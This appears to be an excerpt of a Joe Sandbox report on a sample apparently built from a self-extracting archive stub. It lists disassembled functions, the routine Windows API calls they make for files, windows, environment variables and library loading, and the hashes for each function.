                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3To
                                                            • API String ID: 3498096277-2168385784
                                                            • Opcode ID: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                            • Instruction ID: 7da2cd2f8d7291c42257a5a985dfd7a5bfb2157884af74b08e8ecdbf17264e48
                                                            • Opcode Fuzzy Hash: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                            • Instruction Fuzzy Hash: A4F0FFB1D00209ABCB20AFA9D9499AFFBFCEF94700F004157A555E2241DBB856069BB1
                                                            Function 00CC98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 998 cc98e0-cc9901 call cdec50 1001 cc990c 998->1001 1002 cc9903-cc9906 998->1002 1004 cc990e-cc991f 1001->1004 1002->1001 1003 cc9908-cc990a 1002->1003 1003->1004 1005 cc9927-cc9931 1004->1005 1006 cc9921 1004->1006 1007 cc9936-cc9943 call cc6edb 1005->1007 1008 cc9933 1005->1008 1006->1005 1011 cc994b-cc996a CreateFileW 1007->1011 1012 cc9945 1007->1012 1008->1007 1013 cc996c-cc998e GetLastError call ccbb03 1011->1013 1014 cc99bb-cc99bf 1011->1014 1012->1011 1018 cc99c8-cc99cd 1013->1018 1020 cc9990-cc99b3 CreateFileW GetLastError 1013->1020 1016 cc99c3-cc99c6 1014->1016 1016->1018 1019 cc99d9-cc99de 1016->1019 1018->1019 1021 cc99cf 1018->1021 1022 cc99ff-cc9a10 1019->1022 1023 cc99e0-cc99e3 1019->1023 1020->1016 1024 cc99b5-cc99b9 1020->1024 1021->1019 1026 cc9a2e-cc9a39 1022->1026 1027 cc9a12-cc9a2a call cd0602 1022->1027 1023->1022 1025 cc99e5-cc99f9 SetFileTime 1023->1025 1024->1016 1025->1022 1027->1026
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CC7760,?,00000005,?,00000011), ref: 00CC995F
                                                            • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CC7760,?,00000005,?), ref: 00CC99A2
                                                            • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                            • Instruction ID: ee3130689e0b5fdad901d7914275a5fd7f170291d3bc86b775d2090d0920129b
                                                            • Opcode Fuzzy Hash: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                            • Instruction Fuzzy Hash: 9E3121309447816FE7309F24CC4AFAABB94FB04320F200B1EF9B9961D0D7B4AA44CB95
                                                            Function 00CDB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1057 cdb568-cdb581 PeekMessageW 1058 cdb5bc-cdb5be 1057->1058 1059 cdb583-cdb597 GetMessageW 1057->1059 1060 cdb599-cdb5a6 IsDialogMessageW 1059->1060 1061 cdb5a8-cdb5b6 TranslateMessage DispatchMessageW 1059->1061 1060->1058 1060->1061 1061->1058
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                            • IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                            • TranslateMessage.USER32(?), ref: 00CDB5AC
                                                            • DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                            • Instruction ID: 8e9f454b720d2cbc9fec9177e16d73d356d9fc0f8cab845b38da9d1ad43bb21b
                                                            • Opcode Fuzzy Hash: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                            • Instruction Fuzzy Hash: 35F0BD71A0121AAB8B209FE5AD4CEEB7FACEE156917004415B519D2210EB38D606CBB4
                                                            Function 00CDABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1062 cdabab-cdabca GetClassNameW 1063 cdabcc-cdabe1 call cd1fbb 1062->1063 1064 cdabf2-cdabf4 1062->1064 1069 cdabf1 1063->1069 1070 cdabe3-cdabef FindWindowExW 1063->1070 1065 cdabff-cdac01 1064->1065 1066 cdabf6-cdabf9 SHAutoComplete 1064->1066 1066->1065 1069->1064 1070->1069
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00CDABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CDABF9
                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CDABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                            • Instruction ID: 4382d83a25ac211aae670a6f89fd2c60ad92ecf02db42293ebbe41e5f0f513b6
                                                            • Opcode Fuzzy Hash: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                            • Instruction Fuzzy Hash: D4F0823260132877DB305B649C09FAB76AC9B46B40F484013BB05E22C0D765DB4286BA
                                                            Function 00CDDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1071 cddbde-cddc09 call cdec50 SetEnvironmentVariableW call cd0371 1075 cddc0e-cddc12 1071->1075 1076 cddc14-cddc18 1075->1076 1077 cddc36-cddc38 1075->1077 1078 cddc21-cddc28 call cd048d 1076->1078 1081 cddc1a-cddc20 1078->1081 1082 cddc2a-cddc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                            • Instruction ID: 9d80cf915c9a5441e0732f6dee2af9bf541682a27d0064f8b38db668d830626f
                                                            • Opcode Fuzzy Hash: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                            • Instruction Fuzzy Hash: 24F0EC7291422877CB202F958C06FFF7B58BF44781F044413FF8696255D6B09940D6B1
                                                            Function 00CC9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1083 cc9785-cc9791 1084 cc979e-cc97b5 ReadFile 1083->1084 1085 cc9793-cc979b GetStdHandle 1083->1085 1086 cc97b7-cc97c0 call cc98bc 1084->1086 1087 cc9811 1084->1087 1085->1084 1091 cc97d9-cc97dd 1086->1091 1092 cc97c2-cc97ca 1086->1092 1089 cc9814-cc9817 1087->1089 1093 cc97ee-cc97f2 1091->1093 1094 cc97df-cc97e8 GetLastError 1091->1094 1092->1091 1095 cc97cc 1092->1095 1097 cc980c-cc980f 1093->1097 1098 cc97f4-cc97fc 1093->1098 1094->1093 1096 cc97ea-cc97ec 1094->1096 1099 cc97cd-cc97d7 call cc9785 1095->1099 1096->1089 1097->1089 1098->1097 1100 cc97fe-cc9807 GetLastError 1098->1100 1099->1089 1100->1097 1102 cc9809-cc980a 1100->1102 1102->1099
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00CC9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CC97AD
                                                            • GetLastError.KERNEL32 ref: 00CC97DF
                                                            • GetLastError.KERNEL32 ref: 00CC97FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                            • Instruction ID: 48957f2716f86bd32fb15a278d8bb7808ebd1a2c46edab073a59170e8fca7e2c
                                                            • Opcode Fuzzy Hash: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                            • Instruction Fuzzy Hash: 2B113C31914614EBDF205F65C808F6D37B9FB42361F10892EE426C61D0DB749F44DB62
                                                            Function 00CEAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00CE3F73,00000000,00000000,?,00CEACDB,00CE3F73,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue), ref: 00CEAD66
                                                            • GetLastError.KERNEL32(?,00CEACDB,00CE3F73,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000,00000364,?,00CE98B7), ref: 00CEAD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CEACDB,00CE3F73,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000), ref: 00CEAD80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                            • Instruction ID: edf6b42aed365bb0b5e3328558e63d95bef0eb2d7aa2d03fa4ecbbeb2834bd10
                                                            • Opcode Fuzzy Hash: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                            • Instruction Fuzzy Hash: 7601F7362012A2BFC7214B6A9C44BAB7B58EF05BA27110620F916D3550DB25EB01C6E2
                                                            Function 00CC9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CCD343,00000001,?,?,?,00000000,00CD551D,?,?,?), ref: 00CC9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CD551D,?,?,?,?,?,00CD4FC7,?), ref: 00CC9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CCD343,00000001,?,?), ref: 00CCA011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                            • Instruction ID: b38c8215e631b9e70e08bc9cad3c2ea45145c874d711bd7d3574418246fc2abd
                                                            • Opcode Fuzzy Hash: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                            • Instruction Fuzzy Hash: D231C031204349AFDB14CF20D80CF6EB7A5EF85754F00451DF89297290CB75AE88CBA2
                                                            Function 00CCA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CCC27E: _wcslen.LIBCMT ref: 00CCC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                            • Instruction ID: 752ca8df1bc4bd483af08d2b327e6a53d28a83fb8ad7cd8bbed4708503f00eca
                                                            • Opcode Fuzzy Hash: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                            • Instruction Fuzzy Hash: 2E01B5712002A86AEF21ABB5CC5DFFD36489F09789F08441DF912D61A1DB54CB81D6B7
                                                            Function 00CEB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CEB8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 1f1455edf55e97627e25a626ac10b9e1ad5850d791c2474e81b9074f6c1b6319
                                                            • Instruction ID: 92b9e9f93c872134a54cd602f560f55df6221085a54b4803d8ac6619156fb471
                                                            • Opcode Fuzzy Hash: 1f1455edf55e97627e25a626ac10b9e1ad5850d791c2474e81b9074f6c1b6319
                                                            • Instruction Fuzzy Hash: 7141D4705043CC9ADB218E668C84BFBBBB9EB45304F1404EDE69A86143D335AE45DB61
                                                            Function 00CEAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00CEAFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 5f53721b55e8636569a98e9252636e6576ad3831beb36c04138e817e0097ffe1
                                                            • Instruction ID: b83b8dc36476b33bcd0162535b7b8f392401cfd5b762aa76264a2065a5854530
                                                            • Opcode Fuzzy Hash: 5f53721b55e8636569a98e9252636e6576ad3831beb36c04138e817e0097ffe1
                                                            • Instruction Fuzzy Hash: 4801483250424EBFCF02AF91DC06EEE7F62EF08750F014255FE1466160CA729A31EB82
                                                            Function 00CEAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CEA56F), ref: 00CEAF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 29dcb787f1d2f98c507a9758f62a0640bf9140d1cb100988e91a86fb6c602d5e
                                                            • Instruction ID: fc4cbb317f9e729dde203cb9c92dda8b80ea303b88ff294820e25608ee909037
                                                            • Opcode Fuzzy Hash: 29dcb787f1d2f98c507a9758f62a0640bf9140d1cb100988e91a86fb6c602d5e
                                                            • Instruction Fuzzy Hash: 5EF0903164525CBFCF056F51CC06EBD7F61EF04B11B004165F90996260DA715B20E787
                                                            Function 00CEADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: c782a24ec3ea585948f0adb4b35a2eefad96fca54ed40ba65057072e5a0fc4cc
                                                            • Instruction ID: 798005b770d6f0a61d9d0bf933d7c9e5a7d2a6c30a0f44cb9ffa47f3445649a8
                                                            • Opcode Fuzzy Hash: c782a24ec3ea585948f0adb4b35a2eefad96fca54ed40ba65057072e5a0fc4cc
                                                            • Instruction Fuzzy Hash: 4DE0E531A4521C7BC611AB66DC06F7EBB54DB04B21B0142AAF90597250CDB16F11D6DB
                                                            Function 00CDEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDEAF9
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
